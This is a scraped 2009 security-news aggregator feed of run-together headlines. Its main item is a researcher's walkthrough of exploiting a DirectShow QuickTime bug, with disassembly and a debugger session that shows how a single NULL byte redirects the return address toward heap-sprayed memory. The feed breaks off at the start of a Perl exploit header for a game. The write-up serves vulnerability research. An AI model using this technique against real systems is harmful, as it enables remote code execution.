http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2009-07-03 20:50:16 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/116818.shtmlhttp://www.secuobs.com/revue/news/116818.shtml 2009-07-03 20:13:31 - Ars Technica Security : companion photo for Apple patching critical SMS vulnerability in iPhone OSSecurity researcher Charlie Miller has revealed that Apple is workingon a patch for a security flaw he identified in the iPhone's SMSimplementation The flaw can actually lead to arbitrary codeexecution, as he explained to Ars last month Miller hasn't yetdetailed the flaw, citing an agreement with Apple, though he andpartner Vincenzo Iozzo plan to detail their discovery later this monthat the Black Hat Security Conference in Las VegasDuring a presentation at the SyScan security conference in Singapore,Miller explained that a vulnerability in the iPhone's handling of SMSmessages makes it possible to send code instead of strictly textDespite SMS's 140 byte size limitation, the iPhone can reassemblelarger messages that are broken up to fit the limitation, which allowslarger programs to be sent The iPhone can be instructed to executeSMS data as code instead of text, and when it executes the code itdoes so with root privileges and without any interaction from theuserClick here to read the rest of this articleIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/116791.shtmlhttp://www.secuobs.com/revue/news/116791.shtml 2009-07-03 02:36:44 - milw0rm.com : http://www.secuobs.com/revue/news/116544.shtmlhttp://www.secuobs.com/revue/news/116544.shtml 2009-07-03 01:48:59 - Latest articles from SC Magazine US : A security researcher on Thursday unveiled a new iPhone SMSvulnerability, according to reports out of the SyScan Conference inSingaporeIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/116520.shtmlhttp://www.secuobs.com/revue/news/116520.shtml 2009-07-03 01:35:04 - SecuriTeam Blogs : The startup VoIPShield is changing its disclosure policy to stop givingout VoIP bugs for free and start charging vendors for it CEO RickDalmazzi writes: Avaya doesn’t “have to” pay us for anything We donot “require” payment from you It’s Avaya’s choice if you want toacquire the results of years of work by http://www.secuobs.com/revue/news/116509.shtmlhttp://www.secuobs.com/revue/news/116509.shtml 2009-07-02 23:00:57 - Network World on Security : Apple is working to fix an iPhone vulnerability that could allow anattacker to remotely install and run unsigned software code with rootaccess to the phonehttp://www.secuobs.com/revue/news/116486.shtmlhttp://www.secuobs.com/revue/news/116486.shtml 2009-07-02 22:52:08 - FSecure Antivirus Research Weblog : Charlie Miller, a well-known security researcher who specializes in Macand iPhone security, yesterday revealed information about a newvulnerability in iPhone that allows remote code execution via SMS Nota lot is known about the vulnerability, which was announced at theSyScan conference in Singapore, except that Charlie is working withApple to get it fixed as soon as possibleIMAGEpicture from applecomThis is about as bad as it gets as the vulnerability seems to allowunsigned code to run which circumvents a core part of iPhone'ssecurity model as it's usually only able to run signed code, ie Appsthat have been approved by Apple No user-interaction required whichis unlike current mobile malware InfoWorld has the original storyherePS I’m shift manager for one of our three daily response shifts thisweek and I'm tweeting about what we’re doing in the shift over athttp://twittercom/patrikrunaldOn 02/07/09 At 06:30 PMhttp://www.secuobs.com/revue/news/116482.shtmlhttp://www.secuobs.com/revue/news/116482.shtml 2009-07-02 22:19:35 - milw0rm.com : http://www.secuobs.com/revue/news/116452.shtmlhttp://www.secuobs.com/revue/news/116452.shtml 2009-07-02 22:19:35 - milw0rm.com : http://www.secuobs.com/revue/news/116449.shtmlhttp://www.secuobs.com/revue/news/116449.shtml 2009-07-02 06:10:33 - sudosecure.net : First off let me say that writing this post was a very difficult decisionfor me to make, as I normally try to work with vendors, companies, andorganizations to fix issues like this one I am about to disclosewithout ever really disclosing them to the public, but in this case itjust never http://www.secuobs.com/revue/news/116180.shtmlhttp://www.secuobs.com/revue/news/116180.shtml 2009-07-02 01:14:15 - Rootsecure.net : Wired: ATM Vendor Halts Researchers Talk on Vulnerability "An ATM vendorhas succeeded in getting a security talk pulled from the upcomingBlack Hat conference after a researcher announced he would demonstratea vulnerability in the system"http://www.secuobs.com/revue/news/116065.shtmlhttp://www.secuobs.com/revue/news/116065.shtml 2009-07-02 00:09:03 - Voice of VOIPSA : This is a guest post from Andy Zmolek, Senior Manager, Security Planningand Strategy at Avaya, and past participant in VOIPSEC mailing listdiscussions and other VOIPSA activities Andy asked if I couldpublicize this because he believes it is a discussion which we in thesecurity community need to have Text by Andy Zmolek of http://www.secuobs.com/revue/news/116030.shtmlhttp://www.secuobs.com/revue/news/116030.shtml 2009-07-01 20:23:05 - milw0rm.com : http://www.secuobs.com/revue/news/115952.shtmlhttp://www.secuobs.com/revue/news/115952.shtml 2009-07-01 20:23:05 - milw0rm.com : http://www.secuobs.com/revue/news/115951.shtmlhttp://www.secuobs.com/revue/news/115951.shtml 2009-07-01 05:04:53 - Security Bloggers Network : Here is a very fun post called “Vulnerability Scanning and Clouds: AnAttempt to Move the Dialog On…” I loved it so much, I will just quotemy favorite parts here with a few comments It starts like this: “Muchhas been said about public Iahttp://www.secuobs.com/revue/news/115655.shtmlhttp://www.secuobs.com/revue/news/115655.shtml 2009-07-01 01:19:01 - milw0rm.com : http://www.secuobs.com/revue/news/115542.shtmlhttp://www.secuobs.com/revue/news/115542.shtml 2009-06-30 21:20:26 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/115449.shtmlhttp://www.secuobs.com/revue/news/115449.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115446.shtmlhttp://www.secuobs.com/revue/news/115446.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115445.shtmlhttp://www.secuobs.com/revue/news/115445.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115443.shtmlhttp://www.secuobs.com/revue/news/115443.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115442.shtmlhttp://www.secuobs.com/revue/news/115442.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115441.shtmlhttp://www.secuobs.com/revue/news/115441.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115440.shtmlhttp://www.secuobs.com/revue/news/115440.shtml 2009-06-30 21:15:14 - milw0rm.com : http://www.secuobs.com/revue/news/115438.shtmlhttp://www.secuobs.com/revue/news/115438.shtml 2009-06-30 20:26:14 - DVLabs Blogs : Posted by Aaron PortnoyOn May 28th, 2009 Microsoft released MS Security Advisory 971778titled Vulnerability in Microsoft DirectShow Could Allow Remote CodeExecution This vulnerability should be considered high-risk as itallows for remote code execution through a browser using the WindowsMedia Player ActiveX control In this blog post I provide a brief walkthrough of details of this issue and touch upon how it can beexploited in a reliable fashionThis vulnerability manifests itself within the quartzdll modulelocated within the WindowsSystem32 directory This DLL is part ofMicrosoft's DirectShow multimedia framework and is responsible forparsing various media formats and handing data off to appropriateinstallable compressors and decompressors Frequently, vulnerabilitiesin media formats exist within these installable compressors seeTPTI-09-01 and TPTI-09-02 for recent examples, however, in this casethe problematic code is located within quartz itself It should benoted that Quicktime does NOT need to be installed for this issue tobe exposedPrior to Vista, DirectShow had support for parsing Apple's Quicktimeformat This support was built upon DirectShow's COM-basedarchitecture DirectShow defines the IFilter interface that is used toimplement filter graphs to render and perform miscellaneous operationson streams of media dataWhen attempting to open a media file, quartz loops through differentmedia types defined as AM_MEDIA_TYPE structures, essentially GUIDsand determines if the next node on the filter graph can handle theinput stream's media type, negotiated via objects called Pins seeMark Dowd and John McDonald's Media Frenzy presentationIn practice, the Pin negotiation can be seen in a debugging session asa series of calls similar to this:02d6f770 74837a7f quartzCBaseMSRFilter::NotifyInputConnected+0x5002d6f784 748340b2 quartzCBaseMSRInPin::CompleteConnect+0x3a02d6f79c 7483df8d quartzCBasePin::ReceiveConnection+0xc202d6f7bc 7483e7d7 quartzCBasePin::AttemptConnection+0x54loop here until a successful connection02d6f7e0 7483e36f quartzCBasePin::TryMediaTypes+0x6402d6f80c 7483e2f9 quartzCBasePin::AgreeMediaType+0x7302d6f824 7483e048 quartzCBasePin::Connect+0x55In the case of this QuickTime DirectShow issue, when provided with amalicious file quartz determines the media type can be handled by theCQT class We know that video data is handled in streams Taking alook at the symbols contained within quartz that contains referencesto CQT, we see another interesting class called CQTStream Below is alisting of the functions with symbols for this class:CQTStream::BuildMediaTypelong,CMediaType *CQTStream::CQTStreamushort *,long *,CQT *,ushort const *,intCQTStream::ConvertInternalToRT__int64CQTStream::ConvertRTToInternal__int64CQTStream::DecideBufferSizeIMemAllocator *,_AllocatorProperties *CQTStream::GetAvailable__int64 *,__int64 *CQTStream::GetDuration__int64 *CQTStream::GetEndOfChunklong,long,longCQTStream::GetMaxSampleSizevoidCQTStream::GetMediaTypeint,CMediaType *CQTStream::GetStreamLengthvoidCQTStream::GetStreamStartvoidCQTStream::IsFormatSupported_GUID const * constCQTStream::MapByteOffsetToSamplelong,long *CQTStream::MapSampleToChunklong,long *,long *,SampleToChunk * *CQTStream::MapSampleToTimelongCQTStream::MapTimeToSamplelong,long *CQTStream::OnActivevoidCQTStream::RecordStartAndStop__int64 *,__int64 *,double *,_GUID const * constCQTStream::RefTimeToSampleCRefTimeCQTStream::SampleToRefTimelongCQTStream::UseDownstreamAllocatorvoidCQTStream::`vector deleting destructor'uintCQTStream::~CQTStreamvoidWe can see that the only functions here that take a MediaType as anargument are the BuildMediaType and GetMediaType functions It's asafe bet to assume that they will be handling file data at arelatively lower level than some of the utility functions Quicklydisassembling GetMediaType shows that it is only 6 basic blocks anddoes nothing of interest to usDisassembling BuildMediaType shows more promise Firstly, aninteresting item to note, the presence of a stack cookie:text:748FB8B0 private: long __stdcall CQTStream::BuildMediaTypelong, class CMediaType * proc neartext:748FB8B0text:748FB8B0text:748FB8B0text:748FB8B0   mov     edi, editext:748FB8B2   push    ebptext:748FB8B3   mov     ebp, esptext:748FB8B5   sub     esp, 528htext:748FB8BB   mov     eax, ___security_cookietext:748FB8C0   mov     ebp+stackCookie, eaxIf a standard stack overflow were present in this function it might bea little bit more difficult to exploit However, as we'll see thisparticular DirectShow issue is a more unique stack corruptionvulnerability that will not be affected by the stack cookiemitigationA couple basic blocks into this function shows the first sign thatit's parsing file data:text:748FB8EC loc_748FB8EC:text:748FB8EC   mov     eax, ebx+1B8htext:748FB8F2   cmp     eax, 'ediv'text:748FB8F7   jz      loc_748FBA9Dtext:748FBA9D loc_748FBA9D:text:748FBA9D   push    22text:748FBA9F   pop     ecxtext:748FBAA0   lea     edi, ebp+var_6Ctext:748FBAA3   rep movsdThe 'vide' comparison here is a test for Apple's Quicktime imagecompression type Following the successful branch we arrive at basicblock that begins with a 22 byte seek, which, according to Apple'sfile format documentation, jumps over some extraneous structures andarrives at the very beginning of the ImageDescription 'stsd' atomThis is where the vulnerability begins to manifest Specifically, thenext couple instructions are responsible for parsing the 'name'element of an ImageDescription structure This field is a 32-characterPascal string, implemented as a 31 character string prefixed with a 1byte length value Herein lies the problem if this length byte islarger than 31 characters an attacker can fool the code within quartzinto writing a NULL byte beyond this string The code responsible forthis is shown below:text:748FBAA5   movsx   eax, ebp+pascalStrLen ; the string length prefix bytetext:748FBAA9   mov     ebp+eax+var_39, 0 ; attempted null terminateSo, this vulnerability allows a malicious media file to write a singleNULL byte within 255 bytes in one direction of the stack variablevar_39 Now comes the fun part, exploitation Below is a WinDBGtranscript demonstrating how this can be exploited:0:017 bp quartzCQTStream::BuildMediaType+0x1f5Bp expression 'quartzCQTStream::BuildMediaType+0x1f5' could not be resolved, adding deferred bp0:017 gCreate thread 17:338ModLoad: 76360000 76370000   C:WINDOWSsystem32winstadllModLoad: 74810000 7497d000   C:WINDOWSSystem32quartzdllModLoad: 75f40000 75f51000   C:WINDOWSSystem32devenumdllBreakpoint 0 hiteax=65646976 ebx=01192bf0 ecx=00000000 edx=00000000 esi=01192b8e edi=01b9f08ceip=748fbaa5 esp=01b9eb6c ebp=01b9f0a0 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246quartzCQTStream::BuildMediaType+0x1f5:748fbaa5 0fbe45c6        movsx   eax,byte ptr ebp-3Ah     ss:0023:01b9f066=40The above line is showing the single length byte that comes directlyfrom the file Now, here is the NULL byte write which is attempting toterminate the Pascal string The offset is stored in @eax and thus cancause the following memory write to seek past the string At thispoint we can check the call stack to determine a good location towrite the 0x00 byte This is a contrived example as I have alreadychosen a location that is 0x40 bytes away from ebp-0x39, but forcompleteness the call stack follows0:017 kChildEBP RetAddr01b9f0a0 748fc639 quartzCQTStream::BuildMediaType+0x1f501b9f154 748387f0 quartzCQT::CreateOutputPins+0x70501b9f770 74837a7f quartzCBaseMSRFilter::NotifyInputConnected+0x5001b9f784 748340b2 quartzCBaseMSRInPin::CompleteConnect+0x3a01b9f79c 7483df8d quartzCBasePin::ReceiveConnection+0xc201b9f7bc 7483e7d7 quartzCBasePin::AttemptConnection+0x5401b9f7e0 7483e36f quartzCBasePin::TryMediaTypes+0x6401b9f80c 7483e2f9 quartzCBasePin::AgreeMediaType+0x7301b9f824 7483e048 quartzCBasePin::Connect+0x55So, the quickest location to attempt an overwrite is the returnaddress within the stack frame at 0x01b9f0a0 The return address iscurrently 0x748fc639 By changing a single byte in this, we can causethe process to return to address space that can be reached via ajavascript heap fill in the context of a browser This makes for asimple exploit technique that can be made fairly reliable except ofcourse if we're dealing with a DEP-enabled process in which case amore advanced exploitation technique is required So, let's see whathappens when we overwrite a single byte of that return address0:017 teax=00000040 ebx=01192bf0 ecx=00000000 edx=00000000 esi=01192b8e edi=01b9f08ceip=748fbaa9 esp=01b9eb6c ebp=01b9f0a0 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246quartzCQTStream::BuildMediaType+0x1f9:748fbaa9 c64405c700      mov     byte ptr ebp+eax-39h,0   ss:0023:01b9f0a7=74Here is the before:0:017 dd 01b9f0a0 L201b9f0a0  01b9f154 748fc639After the NULL write:0:017 dd 01b9f0a0 L201b9f0a0  01b9f154 008fc639So, now if we let the process go at this point it will return to0x008fc639 which should not be mapped memory0:017 u 008fc639+0x8fc638:008fc639               ^ Memory access error in 'u 008fc639'0:017 g674f0: Access violation - code c0000005 first chanceFirst chance exceptions are reported before any exception handlingThis exception may be expected and handledeax=00000000 ebx=01173e38 ecx=0000930b edx=00090608 esi=01192bf0 edi=01192dd0eip=008fc639 esp=01b9f0b4 ebp=01b9f154 iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246+0x8fc638:008fc639               0:018 address @eip008c0000 : 008c6000 - 000fa000Type     00020000 MEM_PRIVATEState    00002000 MEM_RESERVEUsage    RegionUsageHeapHandle   008c0000At this point it's game over, a heap spray can easily reach thisaddress However, exploit mitigation techniques such as DEP wouldprevent this method as the pages of memory would not have the executebit set and thus this would throw an access violation even if code waspresent at that address A more advanced exploit could use AlexanderSotirov and Mark Dowd's NET trick to overwrite a different portion ofthe return address and return to a loaded module controlled by theattacker, but that is out of the scope of this postOn a related note I just returned from Sao Paulo, Brazil where I spokeat the You Sh0t the Sheriff conference on the discovery andexploitation of vulnerabilities in 3rd party codecs as well as delvinginto the inner workings of DirectShow The slides should be uploadedto the DVLabs Appearances page next weekThe YSTS event was very informative and I will be writing a blog postsoon covering the presentations I had the pleasure of attending--AaronIMAGEhttp://www.secuobs.com/revue/news/115376.shtmlhttp://www.secuobs.com/revue/news/115376.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115021.shtmlhttp://www.secuobs.com/revue/news/115021.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115020.shtmlhttp://www.secuobs.com/revue/news/115020.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115016.shtmlhttp://www.secuobs.com/revue/news/115016.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115015.shtmlhttp://www.secuobs.com/revue/news/115015.shtml 2009-06-30 00:10:05 - milw0rm.com : http://www.secuobs.com/revue/news/115012.shtmlhttp://www.secuobs.com/revue/news/115012.shtml 2009-06-29 19:47:43 - milw0rm.com : http://www.secuobs.com/revue/news/114928.shtmlhttp://www.secuobs.com/revue/news/114928.shtml 2009-06-29 19:47:43 - milw0rm.com : http://www.secuobs.com/revue/news/114927.shtmlhttp://www.secuobs.com/revue/news/114927.shtml 2009-06-29 19:47:43 - milw0rm.com : http://www.secuobs.com/revue/news/114926.shtmlhttp://www.secuobs.com/revue/news/114926.shtml 2009-06-29 19:47:43 - milw0rm.com : http://www.secuobs.com/revue/news/114922.shtmlhttp://www.secuobs.com/revue/news/114922.shtml 2009-06-29 02:05:14 - Cloud Security : Much has been said about public IaaS providers that expressly forbidcustomers from running network scans against their cloud hostedinfrastructure Failure to comply with the Terms of Service can resultin account suspension or termination ouch This post is my attemptto suggest a way forward I welcome your feedback… As has been notedbefore, http://www.secuobs.com/revue/news/114681.shtmlhttp://www.secuobs.com/revue/news/114681.shtml 2009-06-28 14:28:25 - Steve on Security : http://www.secuobs.com/revue/news/114611.shtmlhttp://www.secuobs.com/revue/news/114611.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114596.shtmlhttp://www.secuobs.com/revue/news/114596.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114594.shtmlhttp://www.secuobs.com/revue/news/114594.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114593.shtmlhttp://www.secuobs.com/revue/news/114593.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114591.shtmlhttp://www.secuobs.com/revue/news/114591.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114590.shtmlhttp://www.secuobs.com/revue/news/114590.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114589.shtmlhttp://www.secuobs.com/revue/news/114589.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114585.shtmlhttp://www.secuobs.com/revue/news/114585.shtml 2009-06-28 14:27:26 - Harmony Security Blog : http://www.secuobs.com/revue/news/114582.shtmlhttp://www.secuobs.com/revue/news/114582.shtml 2009-06-27 02:18:25 - milw0rm.com : http://www.secuobs.com/revue/news/114330.shtmlhttp://www.secuobs.com/revue/news/114330.shtml 2009-06-26 22:56:51 - milw0rm.com : http://www.secuobs.com/revue/news/114262.shtmlhttp://www.secuobs.com/revue/news/114262.shtml 2009-06-26 22:55:41 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/114261.shtmlhttp://www.secuobs.com/revue/news/114261.shtml 2009-06-26 22:55:41 - iDefense Public Vulnerability Disclosures : http://www.secuobs.com/revue/news/114260.shtmlhttp://www.secuobs.com/revue/news/114260.shtml 2009-06-25 22:28:41 - milw0rm.com : http://www.secuobs.com/revue/news/113802.shtmlhttp://www.secuobs.com/revue/news/113802.shtml 2009-06-25 22:28:41 - milw0rm.com : http://www.secuobs.com/revue/news/113801.shtmlhttp://www.secuobs.com/revue/news/113801.shtml 2009-06-25 22:28:41 - milw0rm.com : http://www.secuobs.com/revue/news/113799.shtmlhttp://www.secuobs.com/revue/news/113799.shtml 2009-06-25 22:00:15 - Help Net Security News : A critical vulnerability has been identified in Adobe Shockwave Player1150596 and earlier versions This vulnerability could allow anattacker who successfully exploits this vulnerability to take http://www.secuobs.com/revue/news/113767.shtmlhttp://www.secuobs.com/revue/news/113767.shtml 2009-06-25 17:57:50 - Kellep Charles Information Security Blog Space : Microsoft Internet Explorer Cookie Path Attribute VulnerabilityDate of Discovery: 17112004Criticality: CriticalAffects: Microsoft Internet Explorer 6xCompromise From: From remoteCompromise Type: HijackingSummaryA vulnerability has been reported in Internet Explorer, whichpotentially can be exploited by malicious people to conduct sessionfixation attacksDetailed DescriptionA vulnerability has been reported in Internet Explorer, whichpotentially can be exploited by malicious people to conduct sessionfixation attacksThe vulnerability is caused due to a validation error in the handlingof the path attribute when accepting cookies This can potentially beexploited by a malicious website, if the trusted site supportswildcard domains or the domain name contains the malicious sitesdomain, using a specially crafted path attribute to overwrite cookiesfor the trusted siteThe vulnerability has been reported in Internet Explorer 60 SP1 onMicrosoft Windows XP SP1 Microsoft Windows XP SP2 is reportedly notaffectedNote: Successful exploitation also requires that the trusted sitehandles cookies and authentication in an inappropriate or insecuremannerSolutionUpdate to Windows XP SP2Disable cookies except when neededCVE ReferenceCVE-2004-1527IMAGEhttp://www.secuobs.com/revue/news/113717.shtmlhttp://www.secuobs.com/revue/news/113717.shtml 2009-06-25 06:37:18 - Security : I recently came up with a little API abuse of the clone system callNot earth shattering, but definitely fun Essentially, you can sendany signal you want at any time to your parent process, even if it isrunning with real and effective user id of someone else eg rootFull technical details and an example may be found here:http://scarybeastsorg/security/CESA-2009-002htmlMaybe someone more devious that me can come up with better abusescenarios than I can Have at itSignals are a tricky area of the kernel on a lot of levels I find itinteresting that every slightly unusual way to send signals in thekernel has suffered from access control issues in the past Forexample, this COSEINC advisory notes issues in sending signals viaprctlPR_SET_PDEATHSIG, There were multi-vendor issues withfcntl, F_SETOWN, a long time ago which resurfaced in aLinux-specific manner a little afterIMAGEhttp://www.secuobs.com/revue/news/113498.shtmlhttp://www.secuobs.com/revue/news/113498.shtml 2009-06-25 06:37:18 - Security : I just released some technical details on why and how "seccomp" isvulnerable to the Linux kernel syscall filtering problems that Ipreviously blogged about The full details may be found here:http://scarybeastsorg/security/CESA-2009-004htmlThe actual bug is of little significance because pretty much no-oneuses seccomp:This searches for the PR_SET_SECCOMP string on Google Code SearchIn addition, even if people did use this -- the bug is not a fullbreak out, just some leakage of filesystem names via stat ormischief via unrestricted chmodHowever, I still find this vulnerability interesting It's a soberingreminder that even a very simple security technology can havesurprising bugs seccomp applies extremely tight restrictions onuntrusted code, but within these constraints, the code still hasopportunities to misbehave And this isn't the only example Forreference, check out how a seccomp-constrained process couldhistorically cause trouble in the syscall tracing path with:CVE-2007-4573: trouble with the upper 32-bits of %rax not clearCVE-2008-1615: trouble calling syscalls with a bad value in the %csregisterCVE-2004-0001: trouble with EFLAGS, unknown triggerIMAGEhttp://www.secuobs.com/revue/news/113497.shtmlhttp://www.secuobs.com/revue/news/113497.shtml 2009-06-24 21:49:52 - Cisco Security AdvisoriesSearch Cisco : IMAGEhttp://www.secuobs.com/revue/news/113304.shtmlhttp://www.secuobs.com/revue/news/113304.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113301.shtmlhttp://www.secuobs.com/revue/news/113301.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113300.shtmlhttp://www.secuobs.com/revue/news/113300.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113299.shtmlhttp://www.secuobs.com/revue/news/113299.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113297.shtmlhttp://www.secuobs.com/revue/news/113297.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113296.shtmlhttp://www.secuobs.com/revue/news/113296.shtml 2009-06-24 21:48:30 - milw0rm.com : http://www.secuobs.com/revue/news/113295.shtmlhttp://www.secuobs.com/revue/news/113295.shtml 2009-06-24 16:45:46 - Governmentsecurity.org : Less than two weeks after the last vulnerabilities were closed, Googlehas released version 2017233 of Chrome, a security update fixinganother critical vulnerabilityIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/113135.shtmlhttp://www.secuobs.com/revue/news/113135.shtml 2009-06-24 13:46:41 - Threatpost Feed : Adobe has patched a critical security flaw in its Shockwave Playersoftware which could enable an attacker to gain complete control ofaffected machines The vulnerability affects version 1150596 andearlier of Shockwavehttp://www.secuobs.com/revue/news/113089.shtmlhttp://www.secuobs.com/revue/news/113089.shtml 2009-06-23 21:02:46 - CGISecurity Website and Application Security News : "Google Chrome 2017233 has been released to the Stable and Betachannels This release fixes a critical security issue and two othernetworking bugs CVE-2009-2121: Buffer overflow processing HTTPresponsesGoogle Chrome is vulnerable to a buffer overflow in handlingcertain responses from HTTP servers A specially crafted response froma serverhttp://www.secuobs.com/revue/news/112837.shtmlhttp://www.secuobs.com/revue/news/112837.shtml 2009-06-23 20:23:48 - Infosecurity.US : US-CERT has released the agency’s’s Cyber Security Bulletin SB09-173 — avulnerability summary targeting reported events of last week Thescope of the report is breathtaking, the fundamentals of whichconsistently point to code cruft, sheer coding incompetence, andother, equally disturbing architectural problems pushing ourelectronic bits about SQL Injection, media file vulnerabilities,Linux http://www.secuobs.com/revue/news/112808.shtmlhttp://www.secuobs.com/revue/news/112808.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112426.shtmlhttp://www.secuobs.com/revue/news/112426.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112424.shtmlhttp://www.secuobs.com/revue/news/112424.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112422.shtmlhttp://www.secuobs.com/revue/news/112422.shtml 2009-06-22 23:58:46 - milw0rm.com : http://www.secuobs.com/revue/news/112420.shtmlhttp://www.secuobs.com/revue/news/112420.shtml 2009-06-22 19:56:45 - milw0rm.com : http://www.secuobs.com/revue/news/112334.shtmlhttp://www.secuobs.com/revue/news/112334.shtml 2009-06-22 19:56:45 - milw0rm.com : http://www.secuobs.com/revue/news/112333.shtmlhttp://www.secuobs.com/revue/news/112333.shtml 2009-06-22 19:37:43 - Help Net Security News : Joomla is one of the most widely-used content management systemsWatching its vulnerabilities can be a daunting taks JoomScan can helpweb developers identify possible security weaknesses on their http://www.secuobs.com/revue/news/112293.shtmlhttp://www.secuobs.com/revue/news/112293.shtml 2009-06-20 00:41:50 - Cisco Security AdvisoriesSearch Cisco : A vulnerability exists in the IOS HTTP server in which HTML code insertedinto dynamically generated output, such as the output from a showbuffers command, will be passed to the browser requesting the pageThis HTML code could be interpreted by the client browser andpotentially execute malicious commands against the device or otherpossible cross-site scripting attacks Successful exploitation of thisvulnerability requires that a user browse a page containing dynamiccontent in which HTML commands have been injectedIMAGEhttp://www.secuobs.com/revue/news/111757.shtmlhttp://www.secuobs.com/revue/news/111757.shtml 2009-06-19 22:23:20 - MadIrish.net : Vulnerability assessors and code auditors are often faced with situationswhere a large volume of code needs to be audited quickly to enable adeployment In these situations large web applications need to bereviewed in a fast and efficient manner Although a code levelanalysis is often the most effective way to analyse the security of anapplication it is a time consuming process and not all practical Inthese situations testers often turn to automated tools to helpdiscover vulnerabilitieshttp://wwwmadirishnet/article=231etfrom=rsshttp://www.secuobs.com/revue/news/111709.shtmlhttp://www.secuobs.com/revue/news/111709.shtml 2009-06-19 21:55:36 - Security for the Masses : OWASP has released it's Joomla Vulnerability Scanner, v001Read more at Security-DatabasIMAGEhttp://www.secuobs.com/revue/news/111679.shtmlhttp://www.secuobs.com/revue/news/111679.shtml 2009-06-19 17:56:45 - Security Database Tools Watch : A regularly-updated signature-based scanner that can detect fileinclusion, sql injection, command execution, XSS, DOS, directorytraversal vulnerabilities of a target Joomla web siteThe following features are currently availableExact version Probing the scanner can tell whether a target isrunning version 159Searching known vulnerabilities of Joomla and its componentsReporting to Text et HTML outputImmediate update capability via scanner or svnChanges :New and - Security Tools / Owasp, Vulnerability Scanner,Application Scanner, Joomla ScannerIMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/111600.shtmlhttp://www.secuobs.com/revue/news/111600.shtml 2009-06-19 17:04:45 - bLackhammer.org : Combine this with the Session Auto Recognition module, which willidentify when a logged in session is invalided or expired and willre-login automatically and you have a great tool for scanningauthentication based web applications There is also a lot moresupport for JSP/Tomcat based application, I haven’t had chance to testthis as I http://www.secuobs.com/revue/news/111569.shtmlhttp://www.secuobs.com/revue/news/111569.shtml 2009-06-19 14:17:54 - Darknet The Darkside : http://www.secuobs.com/revue/news/111531.shtmlhttp://www.secuobs.com/revue/news/111531.shtml 2009-06-18 15:09:53 - Security Bloggers Network : Dois tops:Top 10 Web Vulnerability ScannersTop 100 Network SecurityToolsfonte: insecureorgblog Segurança Informáticahttp://wwwseguranca-informaticanet/http://www.secuobs.com/revue/news/111176.shtmlhttp://www.secuobs.com/revue/news/111176.shtml 2009-06-18 01:46:16 - milw0rm.com : http://www.secuobs.com/revue/news/110977.shtmlhttp://www.secuobs.com/revue/news/110977.shtml 2009-06-17 19:25:26 - milw0rm.com : http://www.secuobs.com/revue/news/110834.shtmlhttp://www.secuobs.com/revue/news/110834.shtml 2009-06-17 04:00:30 - milw0rm.com : http://www.secuobs.com/revue/news/110521.shtmlhttp://www.secuobs.com/revue/news/110521.shtml 2009-06-16 23:43:15 - milw0rm.com : http://www.secuobs.com/revue/news/110454.shtmlhttp://www.secuobs.com/revue/news/110454.shtml 2009-06-16 23:15:41 - The Tech Herald Security News : Apple finally released the long awaited patch for a Java vulnerabilitythat they have been aware of for several months on Mondayhttp://www.secuobs.com/revue/news/110417.shtmlhttp://www.secuobs.com/revue/news/110417.shtml 2009-06-16 20:23:27 - Alerts : TrojanAmoevae is a Trojan horse that exploits the Microsoft DirectXDirectShow QuickTime Video Remote Code Execution Vulnerability BID35139 to execute arbitrary code and download files on to thecompromised computerhttp://www.secuobs.com/revue/news/110382.shtmlhttp://www.secuobs.com/revue/news/110382.shtml 2009-06-16 08:11:38 - LiquidWorm's Blog : #/usr/bin/perl## Title: Carom3D 506 Unicode Buffer Overrun/Denial Of Service Vulnerability### Summary: Carom 3D is an online multi-user billiard game created with special# 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8# ball and other Billiard games to life## Product Web Page: http://wwwcarom3dcom/## Description: The world famous korean game Carom3D suffers from a buffer overflow# and a denial of service vulnerability The BoF is triggered at# runtime 